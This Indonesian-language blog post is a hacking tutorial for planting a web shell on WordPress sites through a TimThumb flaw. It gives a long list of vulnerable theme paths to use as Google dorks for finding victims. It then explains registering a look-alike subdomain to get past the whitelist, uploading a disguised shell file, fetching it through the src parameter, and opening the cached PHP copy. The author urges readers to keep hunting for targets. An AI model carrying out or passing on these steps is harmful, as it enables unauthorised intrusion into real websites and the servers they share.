Thursday, April 18, 2013

Browse: Home Tutorial Tanam Shell Dengan Tim-thumb Exploit WordPress

Tanam Shell Dengan Tim-thumb Exploit WordPress

10:07 AM - By Cusromku 0

Tim-thumb Exploit WordPress adalah teknik hacking yang dapat dilakukan dengan memanfaatkan bug pada Timthumb.php atau thumb.php. Themes yang bertema magazine dan ada thumbnail di halaman indeks nya biasanya menggunakan file timthumb.php di dalamnya. Dengan bug pada file ini dapat digunakan sebagai celah untuk melakukan aksi hacking yang tentunya dengan tujuan pertama yaitu menanam shell pada web target. Jika 1 site berhasil di tanami shell, maka tidak menutup kemungkinan website yang berada pada server yang sama bisa kena �hack� juga.


Okeh kita langsung mulai aja deh daripada kelamaan, hehe


DORK Tim-Thumb: 

/wp-content/themes/TheStyle/timthumb.php 
/wp-content/themes/nool/timthumb.php 
/wp-content/themes/PersonalPress/timthumb.php 
/wp-content/themes/SimplePress/timthumb.php 
/wp-content/themes/DeepFocus/timthumb.php 
/wp-content/themes/DelicateNews/timthumb.php 
/wp-content/themes/Bold/timthumb.php 
/wp-content/themes/eStore/timthumb.php 
/wp-content/themes/TheProfessional/timthumb.php 
/wp-content/themes/OnTheGo/timthumb.php 
/wp-content/themes/AskIt/timthumb.php 
/wp-content/themes/Nova/timthumb.php 
/wp-content/themes/eNews/timthumb.php 
/wp-content/themes/eVid/timthumb.php 
/wp-content/themes/TheCorporation/timthumb.php 
/wp-content/themes/Minimal/timthumb.php 
/wp-content/themes/Polished/timthumb.php 
/wp-content/themes/MyResume/timthumb.php 
/wp-content/themes/TheSource/timthumb.php 
/wp-content/themes/StudioBlue/timthumb.php 
/wp-content/themes/Wooden/timthumb.php 
/wp-content/themes/WhosWho/timthumb.php 
/wp-content/themes/Quadro/timthumb.php 
/wp-content/themes/Glow/timthumb.php 
/wp-content/themes/Modest/timthumb.php 
/wp-content/themes/Aggregate/timthumb.php 
/wp-content/themes/ArtSee/timthumb.php 
/wp-content/themes/versatile/timthumb.php 
/wp-content/themes/omni-shop/timthumb.php 
/wp-content/themes/manifesto/scripts/timthumb.php 
/wp-content/themes/arthem-mod/scripts/timthumb.php 
/wp-content/themes/echoes/timthumb.php 
/wp-content/themes/Bold4/timthumb.php 
/wp-content/themes/primely-theme/scripts/timthumb.php 
/wp-content/themes/zenkoreviewRD/scripts/timthumb.php 
/wp-content/themes/ElegantEstate/timthumb.php 
/wp-content/themes/PersonalPress2/timthumb.php 
/wp-content/themes/mypage/scripts/timthumb.php 
/wp-content/themes/magazinum/scripts/timthumb.php 
/wp-content/themes/pbv_multi/scripts/timthumb.php 
/wp-content/themes/photofeature/scripts/timthumb.php 
/wp-content/themes/ColdStone/timthumb.php 
/wp-content/themes/HMDeepFocus/timthumb.php 
/wp-content/themes/EarthlyTouch/timthumb.php 
/wp-content/themes/Boutique/timthumb.php 
/wp-content/themes/ePhoto/timthumb.php 
/wp-content/themes/PureType/timthumb.php 
/wp-content/themes/13Floor/timthumb.php 
/wp-content/themes/BusinessCard/timthumb.php 
/wp-content/themes/CherryTruffle/timthumb.php 
/wp-content/themes/Cion/timthumb.php 
/wp-content/themes/DailyNotes/timthumb.php 
/wp-content/themes/eGallery/timthumb.php 
/wp-content/themes/eGamer/timthumb.php 
/wp-content/themes/GrungeMag/timthumb.php 
/wp-content/themes/Influx/timthumb.php 
/wp-content/themes/LightBright/timthumb.php 
/wp-content/themes/LightSource/timthumb.php 
/wp-content/themes/Magnificent/timthumb.php 
/wp-content/themes/Memoir/timthumb.php 
/wp-content/themes/AskIt_v1.6/AskIt/timthumb.php 
/wp-content/themes/TidalForce/timthumb.php 
/wp-content/themes/Atlantis/timthumb.php 
/wp-content/themes/DelicateNewsYellow/timthumb.php 
/wp-content/themes/themorningafter/timthumb.php 
/wp-content/themes/arthemia-premium/scripts/timthumb.php 
/wp-content/themes/arthemia/scripts/timthumb.php 
/wp-content/themes/arthemia-premium-park/scripts/timthumb.php 
/wp-content/themes/linepress/timthumb.php 
/wp-content/themes/wedding/timthumb.php 
/wp-content/themes/graduate/timthumb.php 
/wp-content/themes/wp-newspaper/timthumb.php 
/wp-content/themes/advanced-newspaper/timthumb.php 
/wp-content/themes/journey/timthumb.php 
/wp-content/themes/newspro/timthumb.php 
/wp-content/themes/transcript/timthumb.php 
/wp-content/themes/showfolio/timthumb.php 
/wp-content/themes/quickstart/timthumb.php 
/wp-content/themes/Restorante/timthumb.php 
/wp-content/themes/snapwire/timthumb.php 
/wp-content/themes/aqua-blue/includes/timthumb.php 
/wp-content/themes/swatch/functions/thumb.php 
/wp-content/themes/announcement/functions/thumb.php 
/wp-content/themes/empire/functions/thumb.php 
/wp-content/themes/supportpress/functions/thumb.php 
/wp-content/themes/editorial/functions/thumb.php 
/wp-content/themes/statua/functions/thumb.php 
/wp-content/themes/briefed/functions/thumb.php 
/wp-content/themes/faultpress/functions/thumb.php 
/wp-content/themes/kaboodle/functions/thumb.php 
/wp-content/themes/savinggrace/functions/thumb.php 
/wp-content/themes/premiere/functions/thumb.php 
/wp-content/themes/simplicity/functions/thumb.php 
/wp-content/themes/deliciousmagazine/functions/thumb.php 
/wp-content/themes/canvas-buddypress/functions/thumb.php 
/wp-content/themes/bookclub/functions/thumb.php 
/wp-content/themes/boldnews/functions/thumb.php 
/wp-content/themes/placeholder/functions/thumb.php 
/wp-content/themes/biznizz/functions/thumb.php 
/wp-content/themes/auld/functions/thumb.php 
/wp-content/themes/listings/functions/thumb.php 
/wp-content/themes/elefolio/functions/thumb.php 
/wp-content/themes/chapters/functions/thumb.php 
/wp-content/themes/continuum/functions/thumb.php 
/wp-content/themes/diner/functions/thumb.php 
/wp-content/themes/skeptical/functions/thumb.php 
/wp-content/themes/caffeinated/functions/thumb.php 
/wp-content/themes/crisp/functions/thumb.php 
/wp-content/themes/sealight/functions/thumb.php 
/wp-content/themes/unite/functions/thumb.php 
/wp-content/themes/estate/functions/thumb.php 
/wp-content/themes/tma/functions/thumb.php 
/wp-content/themes/coda/functions/thumb.php 
/wp-content/themes/inspire/functions/thumb.php 
/wp-content/themes/apz/functions/thumb.php 
/wp-content/themes/spectrum/functions/thumb.php 
/wp-content/themes/diarise/functions/thumb.php 
/wp-content/themes/boast/functions/thumb.php 
/wp-content/themes/retreat/functions/thumb.php 
/wp-content/themes/cityguide/functions/thumb.php 
/wp-content/themes/cinch/functions/thumb.php 
/wp-content/themes/slanted/functions/thumb.php 
/wp-content/themes/canvas/functions/thumb.php 
/wp-content/themes/postcard/functions/thumb.php 
/wp-content/themes/delegate/functions/thumb.php 
/wp-content/themes/mystream/functions/thumb.php 
/wp-content/themes/optimize/functions/thumb.php 
/wp-content/themes/backstage/functions/thumb.php 
/wp-content/themes/sophisticatedfolio/functions/thumb.php 
/wp-content/themes/bueno/functions/thumb.php 
/wp-content/themes/digitalfarm/functions/thumb.php 
/wp-content/themes/headlines/functions/thumb.php 
/wp-content/themes/f0101/functions/thumb.php 
/wp-content/themes/royalle/functions/thumb.php 
/wp-content/themes/exposure/functions/thumb.php 
/wp-content/themes/rockstar/functions/thumb.php 
/wp-content/themes/dailyedition/functions/thumb.php 
/wp-content/themes/object/functions/thumb.php 
/wp-content/themes/antisocial/functions/thumb.php 
/wp-content/themes/coffeebreak/functions/thumb.php 
/wp-content/themes/mortar/functions/thumb.php 
/wp-content/themes/bigeasy/functions/thumb.php 
/wp-content/themes/groovyphoto/functions/thumb.php 
/wp-content/themes/groovyblog/functions/thumb.php 
/wp-content/themes/mainstream/functions/thumb.php 
/wp-content/themes/featurepitch/functions/thumb.php 
/wp-content/themes/suitandtie/functions/thumb.php 
/wp-content/themes/thejournal/functions/thumb.php 
/wp-content/themes/myweblog/functions/thumb.php 
/wp-content/themes/aperture/functions/thumb.php 
/wp-content/themes/metamorphosis/functions/thumb.php 
/wp-content/themes/bloggingstream/functions/thumb.php 
/wp-content/themes/thestation/functions/thumb.php 
/wp-content/themes/groovyvideo/functions/thumb.php 
/wp-content/themes/productum/functions/thumb.php 
/wp-content/themes/newsport/functions/thumb.php 
/wp-content/themes/irresistible/functions/thumb.php 
/wp-content/themes/cushy/functions/thumb.php 
/wp-content/themes/wootube/functions/thumb.php 
/wp-content/themes/forewordthinking/functions/thumb.php 
/wp-content/themes/geometric/functions/thumb.php 
/wp-content/themes/abstract/functions/thumb.php 
/wp-content/themes/busybee/functions/thumb.php 
/wp-content/themes/blogtheme/functions/thumb.php 
/wp-content/themes/gothamnews/functions/thumb.php 
/wp-content/themes/thick/functions/thumb.php 
/wp-content/themes/typebased/functions/thumb.php 
/wp-content/themes/overeasy/functions/thumb.php 
/wp-content/themes/ambience/functions/thumb.php 
/wp-content/themes/snapshot/functions/thumb.php 
/wp-content/themes/openair/functions/thumb.php 
/wp-content/themes/freshfolio/functions/thumb.php 
/wp-content/themes/papercut/functions/thumb.php 
/wp-content/themes/proudfolio/functions/thumb.php 
/wp-content/themes/vibrantcms/functions/thumb.php 
/wp-content/themes/freshnews/functions/thumb.php 
/wp-content/themes/livewire/functions/thumb.php 
/wp-content/themes/gazette/functions/thumb.php 
/wp-content/themes/flashnews/functions/thumb.php 
/wp-content/themes/premiumnews/functions/thumb.php 
/wp-content/themes/newspress/functions/thumb.php 
/wp-content/themes/8q/scripts/timthumb.php 
/wp-content/themes/aerial/lib/timthumb.php 
/wp-content/themes/aesthete/timthumb.php 
/wp-content/themes/albizia/includes/timthumb.php 
/wp-content/themes/amphion-lite/script/timthumb.php 
/wp-content/themes/aranovo/scripts/timthumb.php 
/wp-content/themes/arras/library/timthumb.php 
/wp-content/themes/arras-theme/library/timthumb.php 
/wp-content/themes/arthemix-bronze/scripts/timthumb.php 
/wp-content/themes/artisan/includes/timthumb.php 
/wp-content/themes/arthemix-green/scripts/timthumb.php 
/wp-content/themes/a-simple-business-theme/scripts/timthumb.php 
/wp-content/themes/a-supercms/timthumb.php 
/wp-content/themes/aureola/scripts/timthumb.php 
/wp-content/themes/aurorae/timthumb.php 
/wp-content/themes/autofashion/thumb.php 
/wp-content/themes/automotive-blog-theme/Quick%20Cash%20Auto/timthumb.php 
/wp-content/themes/bikes/thumb.php 
/wp-content/themes/automotive-blog-theme/timthumb.php 
/wp-content/themes/black_eve/timthumb.php 
/wp-content/themes/blex/scripts/timthumb.php 
/wp-content/themes/bloggnorge-a1/scripts/timthumb.php 
/wp-content/themes/blogified/timthumb.php 
/wp-content/themes/blue-corporate-hyve-theme/timthumb.php 
/wp-content/themes/bluemag/library/timthumb.php 
/wp-content/themes/blue-news/scripts/timthumb.php 
/wp-content/themes/bombax/includes/timthumb.php 
/wp-content/themes/breakingnewz/timthumb.php 
/wp-content/themes/brightsky/scripts/timthumb.php 
/wp-content/themes/brochure-melbourne/includes/timthumb.php 
/wp-content/themes/business-turnkey/assets/js/timthumb.php 
/wp-content/themes/calotropis/includes/timthumb.php 
/wp-content/themes/coffee-lite/thumb.php 
/wp-content/themes/comet/scripts/timthumb.php 
/wp-content/themes/conceditor-wp-strict/scripts/timthumb.php 
/wp-content/themes/constructor/layouts/thumb.php 
/wp-content/themes/constructor/libs/timthumb.php 
/wp-content/themes/constructor/timthumb.php 
/wp-content/themes/coverht-wp/scripts/timthumb.php 
/wp-content/themes/cover-wp/scripts/timthumb.php 
/wp-content/themes/dark-dream-media/timthumb.php 
/wp-content/themes/deep-blue/timthumb.php 
/wp-content/themes/delicate/thumb.php 
/wp-content/themes/diamond-ray/thumb.php 
/wp-content/themes/dieselclothings/thumb.php 
/wp-content/themes/digitalblue/thumb.php 
/wp-content/themes/dimenzion/timthumb.php 
/wp-content/themes/epione/script/timthumb.php 
/wp-content/themes/evr-green/scripts/timthumb.php 
/wp-content/themes/famous/megaframe/megapanel/inc/upload.php 
/wp-content/themes/famous/timthumb.php 
/wp-content/themes/fashion-style/thumb.php 
/wp-content/themes/featuring/timthumb.php 
/wp-content/themes/fliphoto/timthumb.php 
/wp-content/themes/flix/timthumb.php 
/wp-content/themes/fordreporter/scripts/thumb.php 
/wp-content/themes/freeside/thumb.php 
/wp-content/themes/fresh-blu/scripts/timthumb.php 
/wp-content/themes/go-green/modules/timthumb.php 
/wp-content/themes/granite-lite/scripts/timthumb.php 
/wp-content/themes/greydove/timthumb.php 
/wp-content/themes/greyzed/functions/efrog/lib/timthumb.php 
/wp-content/themes/gunungkidul/thumb.php 
/wp-content/themes/heartspotting-beta/thumb.php 
/wp-content/themes/heli-1-wordpress-theme/images/timthumb.php 
/wp-content/themes/ideatheme/timthumb.php 
/wp-content/themes/impressio/timthumb/timthumb.php 
/wp-content/themes/introvert/thumb.php 
/wp-content/themes/inuit-types/thumb.php 
/wp-content/themes/isotherm-news/thumb.php 
/wp-content/themes/iwana-v10/timthumb.php 
/wp-content/themes/jambo/thumb.php 
/wp-content/themes/jcblackone/thumb.php 
/wp-content/themes/kratalistic/thumb.php 
/wp-content/themes/life-style-free/thumb.php 
/wp-content/themes/likehacker/timthumb.php 
/wp-content/themes/litepress/scripts/timthumb.php 
/wp-content/themes/loganpress-premium-theme-1/thumb.php 
/wp-content/themes/magazine-basic/thumb.php 
/wp-content/themes/magup/timthumb.php 
/wp-content/themes/make-money-online-theme-1/scripts/timthumb.php 
/wp-content/themes/make-money-online-theme-2/scripts/timthumb.php 
/wp-content/themes/make-money-online-theme-3/scripts/timthumb.php 
/wp-content/themes/make-money-online-theme-4/scripts/timthumb.php 
/wp-content/themes/make-money-online-theme/scripts/timthumb.php 
/wp-content/themes/meintest/layouts/thumb.php 
/wp-content/themes/mobilephonecomparision/thumb.php 
/wp-content/themes/moi-magazine/timthumb.php 
/wp-content/themes/my-heli/images/timthumb.php 
/wp-content/themes/mymag/timthumb.php 
/wp-content/themes/mystique/extensions/auto-thumb/timthumb.php 
/wp-content/themes/nash/theme-assets/php/timthumb.php 
/wp-content/themes/neofresh/timthumb.php 
/wp-content/themes/neo_wdl/includes/extensions/thumb.php 
/wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php 
/wp-content/themes/newspress/thumb.php 
/wp-content/themes/pearlie/scripts/timthumb.php 
/wp-content/themes/pico/scripts/timthumb.php 
/wp-content/themes/postage-sydney/includes/timthumb.php 
/wp-content/themes/premium-violet/thumb.php 
/wp-content/themes/probluezine/timthumb.php 
/wp-content/themes/pronto/cjl/pronto/uploadify/check.php 
/wp-content/themes/pronto/cjl/pronto/uploadify/uploadify.php 
/wp-content/themes/r755/thumb.php 
/wp-content/themes/regal/timthumb.php 
/wp-content/themes/shaan/timthumb.php 
/wp-content/themes/shadow-block/thumb.php 
/wp-content/themes/shadow/timthumb.php 
/wp-content/themes/simple-but-great/timthumb.php 
/wp-content/themes/simplenews_premium/scripts/timthumb.php 
/wp-content/themes/simple-red-theme/timthumb.php 
/wp-content/themes/simple-tabloid/thumb.php 
/wp-content/themes/simplewhite/timthumb.php 
/wp-content/themes/slidette/timThumb/timthumb.php 
/wp-content/themes/snowblind_colbert/thumb.php 
/wp-content/themes/snowblind/thumb.php 
/wp-content/themes/spotlight/timthumb.php 
/wp-content/themes/squeezepage/timthumb.php 
/wp-content/themes/standout/thumb.php 
/wp-content/themes/suffusion/timthumb.php 
/wp-content/themes/swift/includes/thumb.php 
/wp-content/themes/swift/includes/timthumb.php 
/wp-content/themes/swift/timthumb.php 
/wp-content/themes/techozoic-fluid/options/thumb.php 
/wp-content/themes/the_dark_os/tools/timthumb.php 
/wp-content/themes/themetiger-fashion/thumb.php 
/wp-content/themes/theory/thumb.php 
/wp-content/themes/the-theme/core/libs/thumbnails/thumb.php 
/wp-content/themes/thrillingtheme/thumb.php 
/wp-content/themes/tm-theme/js/timthumb.php 
/wp-content/themes/totallyred/scripts/timthumb.php 
/wp-content/themes/travelogue-theme/scripts/timthumb.php 
/wp-content/themes/true-blue-theme/timthumb.php 
/wp-content/themes/ttnews-theme/timthumb.php 
/wp-content/themes/typographywp/timthumb.php 
/wp-content/themes/ugly/timthumb.php 
/wp-content/themes/unity/timthumb.php 
/wp-content/themes/versitility/timthumb.php 
/wp-content/themes/vibefolio-teaser-10/scripts/timthumb.php 
/wp-content/themes/vina/thumb.php 
/wp-content/themes/whitemag/script/thumb.php 
/wp-content/themes/wpapi/thumb.php 
/wp-content/themes/wpbus-d4/includes/timthumb.php 
/wp-content/themes/wp-creativix/scripts/timthumb.php 
/wp-content/themes/wp-newsmagazine/scripts/timthumb.php 
/wp-content/themes/wp-perfect/js/timthumb.php 
/wp-content/themes/wp-premium-orange/timthumb.php 
/wp-content/themes/xiando-one/thumb.php 
/wp-content/themes/zcool-like/timthumb.php 
/wp-content/themes/zcool-like/uploadify.php 
/wp-content/themes/twittplus/scripts/timthumb.php 


Search google dari dork diatas terus pilih salah satu web.


Contoh saya mendapatkan target ini :


http://www.target.com/wp-content/themes/wp-premium-orange/timthumb.php


Kita tinggal memasukan Malicious URL. Ingat timthumb hanya memperbolehkan beberapa situs yang bisa di thumb (dibuat thumbnail) dari external link, seperti blogger.com , picasa.com ,wordpress.org dll
(untuk lebih jelasnnya silahkan anda membuka script timthumb)


Lalu bagaimana caranya, jika web kita tidak termasuk? Pertanyaan yang bagus dan jwban yang singkat �Kita buat Subdomain mirip dengan situs2 tersebut�

Contoh : blogger.com.websitekamu.com | picasa.com.websitekamu.org dst.


Setelah kita buat ex �picasa.com.websitekamu.org� kita Upload shell yang ber-ekstensi .gif .jpeg atau .txt
contoh lagi :
picasa.com.websitekamu.org/shell.txt
picasa.com.websitekamu.org/shell.php.jpeg
picasa.com.websitekamu.org/shell.php.gif


Balik ke atas kita lihat
http://www.target.com/wp-content/themes/wp-premium-orange/timthumb.php


Kita hanya menambahkan query saja, jadi akan seperti ini :
http://www.target.com/wp-content/themes/wp-premium-orange/timthumb.php?src=picasa.com.websitekamu.org/shell.txt?


Kenapa saya menambahkan tanda tanya �/shell.txt?
�Supaya terbaca file php di target kita (denger-denger sih )�


Kalo berhasil biasanya nama tadi akan di encrypt menjadi md5.
Sekarang kita cek, ada beberapa thema yang thumbnya di folder /temp ada juga /cache


coba kita masukan satu2
http://www.target.com/wp-content/themes/wp-premium-orange/temp
http://www.target.com/wp-content/themes/wp-premium-orange/cache


kadang2 ada website yang open base dir pada dir tersebut.(untung2an)

Yaudah apalagi tinggal masukin aja kan?
http://www.target.com/wp-content/themes/wp-premium-orange/cache/MD5_tadi.php
Kalo ane sih biasanya md5nya udah ada terpampang di halaman timthumb (pass error)


Okeh sekian dulu tutor kali, terus mencoba dan bersabar mencari target tentunya, hehe.. semoga berhasil


sumber





Tags: ,
About the Author

Nothing Special From me
View all posts by admin →

Get Updates

Subscribe to our e-mail newsletter to receive updates.

Share This Post

0 comments:

© 2014 hekel-newbie. WP Theme-junkie converted by Bloggertheme9
Powered by Blogger.
back to top